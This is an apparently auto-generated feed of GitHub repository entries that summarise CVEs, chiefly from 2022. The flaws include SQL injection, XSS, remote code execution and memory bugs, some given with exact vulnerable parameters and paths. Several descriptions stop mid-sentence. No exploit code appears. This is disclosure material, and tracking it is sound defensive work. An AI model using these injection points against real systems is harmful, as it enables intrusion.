**CWE-302 Authentication Bypass by Assumed-Immutable Data in AliveCor Kardia App version 5.17.1-754993421 and prior on Android allows an unauthenticated attacker with physical access to the Android device containing the app to bypass application authentication and alter information in the app. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40703](https://github.com/Live-Hack-CVE/CVE-2022-40703) create time: 2022-12-28T17:13:46Z

**In affected versions of Octopus Server it is possible for a session token to be valid indefinitely due to improper validation of the session token parameters. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2782](https://github.com/Live-Hack-CVE/CVE-2022-2782) create time: 2022-12-28T17:13:42Z

**In affected versions of Octopus Server it is possible to reveal the existence of resources in a space that the user does not have access to due to verbose error messaging. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2508](https://github.com/Live-Hack-CVE/CVE-2022-2508) create time: 2022-12-28T17:13:39Z

**The package shescape from 1.5.10 and before 1.6.1 are vulnerable to Regular Expression Denial of Service (ReDoS) via the escape function in index.js, due to the usage of insecure regex in the escapeArgBash function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25918](https://github.com/Live-Hack-CVE/CVE-2022-25918) create time: 2022-12-28T17:13:35Z

**Multiple stored cross-site scripting (XSS) vulnerabilities in Train Scheduler App v1.0 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Train Code, Train Name, and Destination text fields. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42992](https://github.com/Live-Hack-CVE/CVE-2022-42992) create time: 2022-12-28T17:13:16Z

**An authenticated attacker could read Nessus Debug Log file attachments from the web UI without having the correct privileges to do so. This may lead to the disclosure of information on the scan target and/or the Nessus scan to unauthorized parties able to reach the Nessus instance. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33757](https://github.com/Live-Hack-CVE/CVE-2022-33757) create time: 2022-12-28T17:13:12Z

**Barangay Management System v1.0 was discovered to contain a SQL injection vulnerability via the hidden_id parameter at /clearance/clearance.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43228](https://github.com/Live-Hack-CVE/CVE-2022-43228) create time: 2022-12-28T17:13:08Z

**Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the userid parameter at /php_action/fetchSelectedUser.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43233](https://github.com/Live-Hack-CVE/CVE-2022-43233) create time: 2022-12-28T17:13:05Z

**Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the userid parameter at /php_action/fetchOrderData.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43232](https://github.com/Live-Hack-CVE/CVE-2022-43232) create time: 2022-12-28T17:13:01Z

**Canteen Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via /youthappam/manage_website.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43231](https://github.com/Live-Hack-CVE/CVE-2022-43231) create time: 2022-12-28T17:12:58Z

**Simple Cold Storage Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=bookings/view_details. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43230](https://github.com/Live-Hack-CVE/CVE-2022-43230) create time: 2022-12-28T17:12:54Z

**PRTG Network Monitor through 22.2.77.2204 does not prevent custom input for a device’s icon, which can be modified to insert arbitrary content into the style tag for that device. When the device page loads, the arbitrary Cascading Style Sheets (CSS) data is inserted into the style tag, loading malicious content. Due to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35739](https://github.com/Live-Hack-CVE/CVE-2022-35739) create time: 2022-12-28T17:12:47Z

**A memory leak problem was found in the TCP source port generation algorithm in net/ipv4/tcp.c due to the small table perturb size. This flaw may allow an attacker to information leak and may cause a denial of service problem. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1012](https://github.com/Live-Hack-CVE/CVE-2022-1012) create time: 2022-12-28T17:12:35Z

**In Xpdf prior to 4.04, the DCT (JPEG) decoder was incorrectly allowing the 'interleaved' flag to be changed after the first scan of the image, leading to an unknown integer-related vulnerability in Stream.cc. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24106](https://github.com/Live-Hack-CVE/CVE-2022-24106) create time: 2022-12-28T17:12:32Z

**Poppler prior to and including 22.08.0 contains an integer overflow in the JBIG2 decoder (JBIG2Stream::readTextRegionSeg() in JBIGStream.cc). Processing a specially crafted PDF file or JBIG2 image could lead to a crash or the execution of arbitrary code. This is similar to the vulnerability described by CVE-2022-38171 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38784](https://github.com/Live-Hack-CVE/CVE-2022-38784) create time: 2022-12-28T17:12:28Z

**Xpdf prior to 4.04 lacked an integer overflow check in JPXStream.cc. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24107](https://github.com/Live-Hack-CVE/CVE-2022-24107) create time: 2022-12-28T17:11:18Z

**A vulnerability in GitLab CE/EE affecting all versions from 11.10 prior to 15.1.6, 15.2 to 15.2.4, 15.3 to 15.3.2 allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2992](https://github.com/Live-Hack-CVE/CVE-2022-2992) create time: 2022-12-28T17:11:14Z

**iKuai OS v3.6.7 was discovered to contain an authenticated remote code execution (RCE) vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40469](https://github.com/Live-Hack-CVE/CVE-2022-40469) create time: 2022-12-28T17:11:03Z

**Tcpreplay version 4.4.1 contains a memory leakage flaw in fix_ipv6_checksums() function. The highest threat from this vulnerability is to data confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28487](https://github.com/Live-Hack-CVE/CVE-2022-28487) create time: 2022-12-28T17:10:59Z

**AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2097](https://github.com/Live-Hack-CVE/CVE-2022-2097) create time: 2022-12-28T17:10:55Z

**In spring cloud gateway versions prior to 3.1.1+ and 3.0.7+ , applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22947](https://github.com/Live-Hack-CVE/CVE-2022-22947) create time: 2022-12-28T17:10:50Z

**Tcpreplay v4.4.1 has a heap-based buffer overflow in do_checksum_math at /tcpedit/checksum.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27418](https://github.com/Live-Hack-CVE/CVE-2022-27418) create time: 2022-12-28T17:10:46Z

**Tcpreplay v4.4.1 was discovered to contain a double-free via __interceptor_free. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27416](https://github.com/Live-Hack-CVE/CVE-2022-27416) create time: 2022-12-28T17:10:43Z

**The component tcpprep in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in parse_mpls at common/get.c:150. NOTE: this is different from CVE-2022-27942. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37049](https://github.com/Live-Hack-CVE/CVE-2022-37049) create time: 2022-12-28T17:10:39Z

**The component tcprewrite in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in get_l2len_protocol at common/get.c:344. NOTE: this is different from CVE-2022-27941. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37048](https://github.com/Live-Hack-CVE/CVE-2022-37048) create time: 2022-12-28T17:10:36Z

**The component tcprewrite in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in get_ipv6_next at common/get.c:713. NOTE: this is different from CVE-2022-27940. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37047](https://github.com/Live-Hack-CVE/CVE-2022-37047) create time: 2022-12-28T17:10:23Z

**The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveragin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2007-6755](https://github.com/Live-Hack-CVE/CVE-2007-6755) create time: 2022-12-28T15:48:29Z

**Samba 3.2.0 uses weak permissions (0666) for the (1) group_mapping.tdb and (2) group_mapping.ldb files, which allows local users to modify the membership of Unix groups. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2008-3789](https://github.com/Live-Hack-CVE/CVE-2008-3789) create time: 2022-12-28T16:25:40Z

**mount.cifs in Samba 3.0 before 3.0.37, 3.2 before 3.2.15, 3.3 before 3.3.8 and 3.4 before 3.4.2, when mount.cifs is installed suid root, does not properly enforce permissions, which allows local users to read part of the credentials file and obtain the password by specifying the path to the credentials file and using t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2009-2948](https://github.com/Live-Hack-CVE/CVE-2009-2948) create time: 2022-12-28T16:25:44Z

**Cross-site scripting (XSS) vulnerability in the chg_passwd function in web/swat.c in the Samba Web Administration Tool (SWAT) in Samba 3.x before 3.5.10 allows remote authenticated administrators to inject arbitrary web script or HTML via the username parameter to the passwd program (aka the user field to the Change Pa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-2694](https://github.com/Live-Hack-CVE/CVE-2011-2694) create time: 2022-12-28T16:25:48Z

**The BEGIN regular expression in the awk script detector in magic/Magdir/commands in file before 5.15 uses multiple wildcards with unlimited repetitions, which allows context-dependent attackers to cause a denial of service (CPU consumption) via a crafted ASCII file that triggers a large amount of backtracking, as demon CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-7345](https://github.com/Live-Hack-CVE/CVE-2013-7345) create time: 2022-12-28T16:25:58Z

**The scan function in ext/date/lib/parse_iso_intervals.c in PHP through 5.5.6 does not properly restrict creation of DateInterval objects, which might allow remote attackers to cause a denial of service (heap-based buffer over-read) via a crafted interval specification. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-6712](https://github.com/Live-Hack-CVE/CVE-2013-6712) create time: 2022-12-28T16:25:51Z

**The cdf_read_property_info function in cdf.c in the Fileinfo component in PHP before 5.4.29 and 5.5.x before 5.5.13 allows remote attackers to cause a denial of service (infinite loop or out-of-bounds memory access) via a vector that (1) has zero length or (2) is too long. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-0238](https://github.com/Live-Hack-CVE/CVE-2014-0238) create time: 2022-12-28T16:26:02Z

**Fine Free file before 5.17 allows context-dependent attackers to cause a denial of service (infinite recursion, CPU consumption, and crash) via a crafted indirect offset value in the magic of a file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-1943](https://github.com/Live-Hack-CVE/CVE-2014-1943) create time: 2022-12-28T16:25:54Z

**** DISPUTED ** The transfer and transferFrom functions of a smart contract implementation for Bittelux (BTX), an Ethereum token, have an integer overflow. NOTE: this has been disputed by a third party. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-13326](https://github.com/Live-Hack-CVE/CVE-2018-13326) create time: 2022-12-28T16:21:21Z

**** DISPUTED ** The transfer and transferFrom functions of a smart contract implementation for Pandora (PDX), an Ethereum token, have an integer overflow. NOTE: this has been disputed by a third party. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-13144](https://github.com/Live-Hack-CVE/CVE-2018-13144) create time: 2022-12-28T16:21:17Z

**** DISPUTED ** The transfer and transferFrom functions of a smart contract implementation for Easy Trading Token (ETT), an Ethereum token, have an integer overflow. NOTE: this has been disputed by a third party. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-13113](https://github.com/Live-Hack-CVE/CVE-2018-13113) create time: 2022-12-28T16:21:13Z

**** DISPUTED ** The transfer and transferFrom functions of a smart contract implementation for ChuCunLingAIGO (CCLAG), an Ethereum token, have an integer overflow. NOTE: this has been disputed by a third party. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-13327](https://github.com/Live-Hack-CVE/CVE-2018-13327) create time: 2022-12-28T16:21:10Z

**zzcms 8.2 allows remote attackers to discover the full path via a direct request to 3/qq_connect2.0/API/class/ErrorCase.class.php or 3/ucenter_api/code/friend.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-7434](https://github.com/Live-Hack-CVE/CVE-2018-7434) create time: 2022-12-28T15:44:52Z

**An issue was discovered in zzcms 8.2. user/adv.php allows remote attackers to delete arbitrary files via directory traversal sequences in the oldimg parameter. This can be leveraged for database access by deleting install.lock. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-9331](https://github.com/Live-Hack-CVE/CVE-2018-9331) create time: 2022-12-28T15:44:45Z

**An issue was discovered in zzcms 8.2. It allows SQL injection via the id parameter in a dl/dl_sendsms.php request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-9309](https://github.com/Live-Hack-CVE/CVE-2018-9309) create time: 2022-12-28T15:44:37Z

**An issue was discovered in zzcms 8.2. user/ppsave.php allows remote attackers to delete arbitrary files via directory traversal sequences in the oldimg parameter in an action=modify request. This can be leveraged for database access by deleting install.lock. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-8965](https://github.com/Live-Hack-CVE/CVE-2018-8965) create time: 2022-12-28T15:44:34Z

**An issue was discovered in zzcms 8.2. user/manage.php allows remote attackers to delete arbitrary files via directory traversal sequences in the oldimg or oldflv parameter in an action=modify request. This can be leveraged for database access by deleting install.lock. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-8968](https://github.com/Live-Hack-CVE/CVE-2018-8968) create time: 2022-12-28T15:44:30Z

**An issue was discovered in zzcms 8.2. It allows PHP code injection via the siteurl parameter to install/index.php, as demonstrated by injecting a phpinfo() call into /inc/config.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-8966](https://github.com/Live-Hack-CVE/CVE-2018-8966) create time: 2022-12-28T15:44:12Z

**An issue was discovered in zzcms 8.2. It allows SQL injection via the id parameter in an adv2.php?action=modify request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-8967](https://github.com/Live-Hack-CVE/CVE-2018-8967) create time: 2022-12-28T15:44:09Z

**An issue was discovered in zzcms 8.2. user/licence_save.php allows remote attackers to delete arbitrary files via directory traversal sequences in the oldimg parameter in an action=modify request. This can be leveraged for database access by deleting install.lock. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-8969](https://github.com/Live-Hack-CVE/CVE-2018-8969) create time: 2022-12-28T15:44:04Z

**Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Ja CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2988](https://github.com/Live-Hack-CVE/CVE-2019-2988) create time: 2022-12-28T16:20:28Z

**Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Ja CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2992](https://github.com/Live-Hack-CVE/CVE-2019-2992) create time: 2022-12-28T16:20:20Z

**Vulnerability in the Java SE product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 11.0.6 and 14. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Java SE. Successful attacks of this vulnerability can result in unauth CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2767](https://github.com/Live-Hack-CVE/CVE-2020-2767) create time: 2022-12-28T16:25:36Z

**** DISPUTED ** Liferay Portal Server tested on 7.3.5 GA6, 7.2.0 GA1 is affected by OS Command Injection. An administrator user can inject Groovy script to execute any OS command on the Liferay Portal Sever. NOTE: The developer disputes this as a vulnerability since it is a feature for administrators to run groovy scrip CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28884](https://github.com/Live-Hack-CVE/CVE-2020-28884) create time: 2022-12-28T16:21:06Z

**D-Link DIR-846 devices with firmware 100A35 allow remote attackers to execute arbitrary code as root via HNAP1/control/SetGuestWLanSettings.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21016](https://github.com/Live-Hack-CVE/CVE-2020-21016) create time: 2022-12-28T15:46:45Z

**Incorrect Default Permissions vulnerability in Hitachi Infrastructure Analytics Advisor on Linux (Analytics probe component), Hitachi Ops Center Analyzer on Linux (Analyzer probe component), Hitachi Ops Center Viewpoint on Linux (Viewpoint RAID Agent component) allows local users to read and write specific files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36605](https://github.com/Live-Hack-CVE/CVE-2020-36605) create time: 2022-12-28T15:41:38Z

**Auth. (editor+) Reflected Cross-Site Scripting (XSS) vulnerability in ExpressTech Quiz And Survey Master plugin <= 7.3.4 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36864](https://github.com/Live-Hack-CVE/CVE-2021-36864) create time: 2022-12-28T16:24:24Z

**Auth. SQL Injection (SQLi) vulnerability in Quiz And Survey Master plugin <= 7.3.4 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36898](https://github.com/Live-Hack-CVE/CVE-2021-36898) create time: 2022-12-28T16:24:20Z

**** DISPUTED ** An unauthorized access vulnerabiitly exists in all versions of Portainer, which could let a malicious user obtain sensitive information. NOTE: Portainer has received no detail of this CVE report. There is also no response after multiple attempts of contacting the original source. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41874](https://github.com/Live-Hack-CVE/CVE-2021-41874) create time: 2022-12-28T16:21:01Z

**xfig 3.2.7 is vulnerable to Buffer Overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40241](https://github.com/Live-Hack-CVE/CVE-2021-40241) create time: 2022-12-28T15:48:40Z

**All versions of CEVAS prior to 1.01.46 do not sufficiently validate user-controllable input and could allow a user to bypass authentication and retrieve data with specially crafted SQL queries. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36206](https://github.com/Live-Hack-CVE/CVE-2021-36206) create time: 2022-12-28T15:47:57Z

**An issue was discovered in the tokio crate before 1.8.4, and 1.9.x through 1.13.x before 1.13.1, for Rust. In certain circumstances involving a closed oneshot channel, there is a data race and memory corruption. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45710](https://github.com/Live-Hack-CVE/CVE-2021-45710) create time: 2022-12-28T15:47:30Z

**Stimulsoft (aka Stimulsoft Reports) 2013.1.1600.0, when Compilation Mode is used, allows an attacker to execute arbitrary C# code on any machine that renders a report, including the application server or a user's local machine, as demonstrated by System.Diagnostics.Process.Start. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42777](https://github.com/Live-Hack-CVE/CVE-2021-42777) create time: 2022-12-28T15:45:16Z

**A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser (r:parsebody() called from Lua scripts). The Apache httpd team is not aware of an exploit for the vulnerabilty though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and earlier. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44790](https://github.com/Live-Hack-CVE/CVE-2021-44790) create time: 2022-12-28T15:40:39Z

**A crafted URI sent to httpd configured as a forward proxy (ProxyRequests on) can cause a crash (NULL pointer dereference) or, for configurations mixing forward and reverse proxy declarations, can allow for requests to be directed to a declared Unix Domain Socket endpoint (Server Side Request Forgery). This issue affect CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44224](https://github.com/Live-Hack-CVE/CVE-2021-44224) create time: 2022-12-28T15:40:36Z

**vim is vulnerable to Out-of-bounds Read CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4166](https://github.com/Live-Hack-CVE/CVE-2021-4166) create time: 2022-12-28T15:40:32Z

**vim is vulnerable to Use After Free CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4187](https://github.com/Live-Hack-CVE/CVE-2021-4187) create time: 2022-12-28T15:40:27Z

**vim is vulnerable to Use After Free CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4173](https://github.com/Live-Hack-CVE/CVE-2021-4173) create time: 2022-12-28T15:40:19Z

**Multiple vulnerabilities in Cisco TelePresence Collaboration Endpoint (CE) Software and Cisco RoomOS Software could allow an attacker to conduct path traversal attacks, view sensitive data, or write arbitrary files on an affected device. For more information about these vulnerabilities, see the Details section of this CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20776](https://github.com/Live-Hack-CVE/CVE-2022-20776) create time: 2022-12-28T16:25:18Z

**A Cross-Site Request Forgery (CSRF) in dzzoffice 2.02.1_SC_UTF8 allows attackers to arbitrarily create user accounts and grant Administrator rights to regular users. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43340](https://github.com/Live-Hack-CVE/CVE-2022-43340) create time: 2022-12-28T16:25:14Z

**Incomplete filtering of JavaScript code in different configuration fields of the web based interface of the VIDEOJET multi 4000 allows an attacker with administrative credentials to store JavaScript code which will be executed for all administrators accessing the same configuration option. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40184](https://github.com/Live-Hack-CVE/CVE-2022-40184) create time: 2022-12-28T16:25:11Z

**The implementation of backslash parsing in the Dart URI class for versions prior to 2.18 and Flutter versions prior to 3.30 differs from the WhatWG URL standards. Dart uses the RFC 3986 syntax, which creates incompatibilities with the '\' characters in URIs, which can lead to auth bypass in webapps interpreting URIs. W CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3095](https://github.com/Live-Hack-CVE/CVE-2022-3095) create time: 2022-12-28T16:25:07Z

**Multiple stored cross-site scripting (XSS) vulnerabilities in GL.iNet GoodCloud IoT Device Management System Version 1.00.220412.00 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Company Name and Description text fields. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42054](https://github.com/Live-Hack-CVE/CVE-2022-42054) create time: 2022-12-28T16:25:03Z

**It was possible to bypass policies configured for Zero Trust Secure Web Gateway by using warp-cli 'set-custom-endpoint' subcommand. Using this command with an unreachable endpoint caused the WARP Client to disconnect and allowed bypassing administrative restrictions on a Zero Trust enrolled endpoint. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3320](https://github.com/Live-Hack-CVE/CVE-2022-3320) create time: 2022-12-28T16:24:59Z

**Horner Automation's Cscape version 9.90 SP7 and prior does not properly validate user-supplied data. If a user opens a maliciously formed FNT file, then an attacker could execute arbitrary code within the current process by writing outside the memory buffer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3379](https://github.com/Live-Hack-CVE/CVE-2022-3379) create time: 2022-12-28T16:24:55Z

**Horner Automation's Cscape version 9.90 SP 7 and prior does not properly validate user-supplied data. If a user opens a maliciously formed FNT file, then an attacker could execute arbitrary code within the current process by accessing an uninitialized pointer, leading to an out-of-bounds memory write. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3378](https://github.com/Live-Hack-CVE/CVE-2022-3378) create time: 2022-12-28T16:24:52Z

**Attackers can create long chains of CAs that would lead to OctoRPKI exceeding its max iterations parameter. In consequence it would cause the program to crash, preventing it from finishing the validation and leading to a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3616](https://github.com/Live-Hack-CVE/CVE-2022-3616) create time: 2022-12-28T16:24:48Z

**VMware Cloud Foundation (NSX-V) contains an XML External Entity (XXE) vulnerability. On VCF 3.x instances with NSX-V deployed, this may allow a user to exploit this issue leading to a denial-of-service condition or unintended information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31678](https://github.com/Live-Hack-CVE/CVE-2022-31678) create time: 2022-12-28T16:24:35Z

**Lock Warp switch is a feature of Zero Trust platform which, when enabled, prevents users of enrolled devices from disabling WARP client. Due to insufficient policy verification by WARP iOS client, this feature could be bypassed by using the "Disable WARP" quick action. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3322](https://github.com/Live-Hack-CVE/CVE-2022-3322) create time: 2022-12-28T16:24:31Z

**A vulnerability was found in SourceCodester Web-Based Student Clearance System. It has been classified as critical. This affects an unknown part of the file Admin/edit-admin.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3733](https://github.com/Live-Hack-CVE/CVE-2022-3733) create time: 2022-12-28T16:24:28Z

**Multiple vulnerabilities in Cisco TelePresence Collaboration Endpoint (CE) Software and Cisco RoomOS Software could allow an attacker to conduct path traversal attacks, view sensitive data, or write arbitrary files on an affected device. For more information about these vulnerabilities, see the Details section of this CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20954](https://github.com/Live-Hack-CVE/CVE-2022-20954) create time: 2022-12-28T16:24:16Z

**Multiple vulnerabilities in Cisco TelePresence Collaboration Endpoint (CE) Software and Cisco RoomOS Software could allow an attacker to conduct path traversal attacks, view sensitive data, or write arbitrary files on an affected device. For more information about these vulnerabilities, see the Details section of this CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20955](https://github.com/Live-Hack-CVE/CVE-2022-20955) create time: 2022-12-28T16:24:12Z

**A sandbox bypass vulnerability involving various casts performed implicitly by the Groovy language runtime in Jenkins Script Security Plugin 1183.v774b_0b_0a_a_451 and earlier allows attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrar CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43401](https://github.com/Live-Hack-CVE/CVE-2022-43401) create time: 2022-12-28T16:24:07Z

**Nextcloud Server is the file server software for Nextcloud, a self-hosted productivity platform. Nextcloud Server and Nextcloud Enterprise Server prior to versions 23.0.9 and 24.0.5 are vulnerable to exposure of information that cannot be controlled by administrators without direct database access. Versions 23.0.9 and CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39329](https://github.com/Live-Hack-CVE/CVE-2022-39329) create time: 2022-12-28T16:24:03Z

**Multiple vulnerabilities in Cisco TelePresence Collaboration Endpoint (CE) Software and Cisco RoomOS Software could allow an attacker to conduct path traversal attacks, view sensitive data, or write arbitrary files on an affected device. For more information about these vulnerabilities, see the Details section of this CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20953](https://github.com/Live-Hack-CVE/CVE-2022-20953) create time: 2022-12-28T16:23:40Z

**A vulnerability in the Cisco AnyConnect VPN server of Cisco Meraki MX and Cisco Meraki Z3 Teleworker Gateway devices could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to insufficient validation of client-supplied parameters whil CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20933](https://github.com/Live-Hack-CVE/CVE-2022-20933) create time: 2022-12-28T16:23:36Z

**A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to read and delete files on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20822](https://github.com/Live-Hack-CVE/CVE-2022-20822) create time: 2022-12-28T16:23:33Z

**Multiple vulnerabilities in Cisco TelePresence Collaboration Endpoint (CE) Software and Cisco RoomOS Software could allow an attacker to conduct path traversal attacks, view sensitive data, or write arbitrary files on an affected device. For more information about these vulnerabilities, see the Details section of this CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20811](https://github.com/Live-Hack-CVE/CVE-2022-20811) create time: 2022-12-28T16:23:29Z

**Expat (aka libexpat) before 2.4.4 has an integer overflow in the doProlog function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23990](https://github.com/Live-Hack-CVE/CVE-2022-23990) create time: 2022-12-28T16:23:25Z

**U-Office Force login function has an Open Redirect vulnerability. An unauthenticated remote attacker can exploit this vulnerability to redirect user to arbitrary website. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39021](https://github.com/Live-Hack-CVE/CVE-2022-39021) create time: 2022-12-28T16:23:21Z

**Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/update_traveller.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40352](https://github.com/Live-Hack-CVE/CVE-2022-40352) create time: 2022-12-28T16:23:18Z

**U-Office Force PrintMessage function has insufficient filtering for special characters. An unauthenticated remote attacker can exploit this vulnerability to inject JavaScript and perform XSS (Reflected Cross-Site Scripting) attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39025](https://github.com/Live-Hack-CVE/CVE-2022-39025) create time: 2022-12-28T16:23:14Z

**U-Office Force Bulletin function has insufficient filtering for special characters. An unauthenticated remote attacker can exploit this vulnerability to inject JavaScript and perform XSS (Reflected Cross-Site Scripting) attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39024](https://github.com/Live-Hack-CVE/CVE-2022-39024) create time: 2022-12-28T16:23:11Z

